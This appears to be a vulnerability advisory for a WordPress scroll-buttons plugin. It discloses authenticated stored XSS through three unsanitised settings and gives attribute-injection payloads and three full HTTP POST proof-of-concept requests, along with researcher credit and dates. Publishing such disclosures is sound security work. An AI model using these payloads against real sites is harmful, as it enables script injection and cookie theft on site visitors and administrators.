The plugin did not properly sanitise and validate its settings, such as psb_distance, psb_buttonsize, psb_speed, only validating them client side. This could allow high privilege users (such as admin) to set XSS payloads in them
### -- [ Payloads: ] [$] " autofocus=autofocus onfocus=alert(document.cookie); " [$] " autofocus=autofocus onfocus=alert(document.domain); " ### -- [ PoC #1 | Authenticated Persistent XSS | Scrolling distance: ] [!] POST /wp-admin/admin-post.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 289 action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_buttonsize=13&psb_speed=13 ### -- [ PoC #2 | Authenticated Persistent XSS | Button size: ] [!] POST /wp-admin/admin-post.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 289 action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_speed=13 ### -- [ PoC #3 | Authenticated Persistent XSS | Scrolling speed: ] [!] POST /wp-admin/admin-post.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 289 action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=13&psb_speed=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.domain%29%3B+%22
m0ze
m0ze
Yes
2021-05-17 (about 1 years ago)
2021-05-17 (about 1 years ago)
2021-05-18 (about 1 years ago)